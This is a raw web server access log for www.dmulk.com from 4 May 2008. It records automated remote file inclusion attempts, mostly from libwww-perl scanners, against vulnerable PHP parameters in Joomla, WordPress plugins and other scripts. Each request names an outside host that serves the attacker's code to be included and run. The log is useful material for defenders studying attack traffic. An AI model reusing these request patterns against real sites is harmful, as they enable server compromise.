208.74.9.26 - - [04/May/2008:12:41:25 -0700] "GET /logs/access_080215.log/////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:12:41:27 -0700] "GET /////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:12:41:28 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 200 45991 "-" "libwww-perl/5.805" "www.dmulk.com"
201.21.40.235 - - [04/May/2008:12:41:29 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://jogador.fxplus.mail333.su/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:12:41:29 -0700] "GET /logs/access_080121.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:12:41:30 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.21.40.235 - - [04/May/2008:12:41:30 -0700] "GET //skin/zero_vote/error.php?dir=http://jogador.fxplus.mail333.su/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:12:41:30 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.107.122 - - [04/May/2008:12:41:51 -0700] "GET //index2.php?t=http://www.deadword.we.bs/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.199 - - [04/May/2008:12:42:23 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.18.47 - - [04/May/2008:12:42:25 -0700] "GET /logs//errors.php?error=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
85.214.18.47 - - [04/May/2008:12:42:25 -0700] "GET //errors.php?error=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
85.214.33.45 - - [04/May/2008:12:43:27 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:12:43:55 -0700] "GET /logs/access_080313.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.107.122 - - [04/May/2008:12:44:12 -0700] "GET /logs/access_080213.log//index2.php?t=http://www.deadword.we.bs/mic22.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [04/May/2008:12:44:12 -0700] "GET //index2.php?t=http://www.deadword.we.bs/mic22.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [04/May/2008:12:44:12 -0700] "GET /logs//index2.php?t=http://www.deadword.we.bs/mic22.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:12:44:23 -0700] "GET /logs/access_080313.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:12:44:29 -0700] "GET /logs/access_080223.log/////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:12:44:30 -0700] "GET /////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:12:44:30 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 200 45991 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [04/May/2008:12:44:33 -0700] "GET /logs/access_080213.log//index2.php?t=http://www.deadword.we.bs/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [04/May/2008:12:44:33 -0700] "GET /logs//index2.php?t=http://www.deadword.we.bs/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:12:44:36 -0700] "GET /logs/access_080120.log/////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:12:44:39 -0700] "GET /logs/access_080313.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.84.143.199 - - [04/May/2008:12:44:58 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:12:45:34 -0700] "GET /logs/access_080313.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:12:45:38 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 200 45991 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:12:45:39 -0700] "GET /////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [04/May/2008:12:46:36 -0700] "GET /logs/access_080222.log/solpot.html?body=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [04/May/2008:12:46:36 -0700] "GET /solpot.html?body=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [04/May/2008:12:46:37 -0700] "GET /logs/solpot.html?body=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:12:46:48 -0700] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:12:46:48 -0700] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
67.19.107.122 - - [04/May/2008:12:46:51 -0700] "GET /logs/access_080213.log//index2.php?t=http://www.deadword.we.bs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:12:46:51 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://yogyafree.net/files/arab.txt? HTTP/1.0" 200 11590 "-" "libwww-perl/5.53" "www.dmulk.com"
67.19.107.122 - - [04/May/2008:12:46:51 -0700] "GET //index2.php?t=http://www.deadword.we.bs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [04/May/2008:12:46:51 -0700] "GET /logs//index2.php?t=http://www.deadword.we.bs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:12:46:52 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:12:46:53 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:12:46:57 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://yogyafree.net/files/arab.txt? HTTP/1.0" 200 11590 "-" "libwww-perl/5.53" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:12:47:29 -0700] "GET /logs/access_080313.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:12:47:30 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:12:47:30 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.7.32.9 - - [04/May/2008:12:47:43 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.7.32.9 - - [04/May/2008:12:47:43 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:12:48:00 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:12:48:00 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.42.133.2 - - [04/May/2008:12:48:04 -0700] "GET /logs/access_080321.log/solpot.html?body=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [04/May/2008:12:48:04 -0700] "GET /solpot.html?body=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [04/May/2008:12:48:05 -0700] "GET /logs/solpot.html?body=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [04/May/2008:12:48:18 -0700] "GET /logs/solpot.html?body=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [04/May/2008:12:48:19 -0700] "GET /solpot.html?body=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.199 - - [04/May/2008:12:48:32 -0700] "GET /logs/access_080216.log//index.php?option=com_expose&Itemid2=&mosConfig_absolute_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.143.199 - - [04/May/2008:12:48:37 -0700] "GET //index.php?option=com_expose&Itemid2=&mosConfig_absolute_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.143.199 - - [04/May/2008:12:48:38 -0700] "GET /logs//index.php?option=com_expose&Itemid2=&mosConfig_absolute_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:12:49:29 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:12:49:29 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:12:49:30 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:12:49:32 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:12:49:46 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:12:49:46 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:12:49:46 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:12:49:46 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:12:49:46 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:12:49:46 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:12:49:46 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:12:49:46 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:12:49:47 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:12:49:49 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:12:49:49 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:12:49:49 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:12:50:00 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:12:50:00 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:12:50:00 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:12:50:02 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:12:50:02 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:12:50:02 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:12:50:02 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:12:50:04 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.137.192.95 - - [04/May/2008:12:50:09 -0700] "GET /galerie.php?do=ftp://128.175.10.3/incoming/smile03.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.137.192.95 - - [04/May/2008:12:50:10 -0700] "GET /galerie.php?do=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:12:50:25 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:12:50:25 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:12:50:25 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:12:50:25 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:12:50:25 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:12:50:25 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:12:50:29 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:12:50:29 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:12:50:52 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:12:50:52 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:12:50:52 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:12:50:54 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:12:50:54 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:12:50:55 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:12:50:55 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:12:50:55 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:12:50:55 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:12:50:56 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.42.133.2 - - [04/May/2008:12:50:57 -0700] "GET /logs/access_080222.log/solpot.html?body=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:12:50:58 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:12:50:58 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:12:51:00 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:12:51:00 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:12:51:00 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:12:51:02 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:12:51:02 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:12:51:02 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:12:51:03 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.130.2.13 - - [04/May/2008:12:51:04 -0700] "GET /logs/access_080302.log/index.php?pageurl=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.130.2.13 - - [04/May/2008:12:51:04 -0700] "GET /logs/index.php?pageurl=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:12:51:04 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:12:51:04 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:12:51:04 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:12:51:05 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
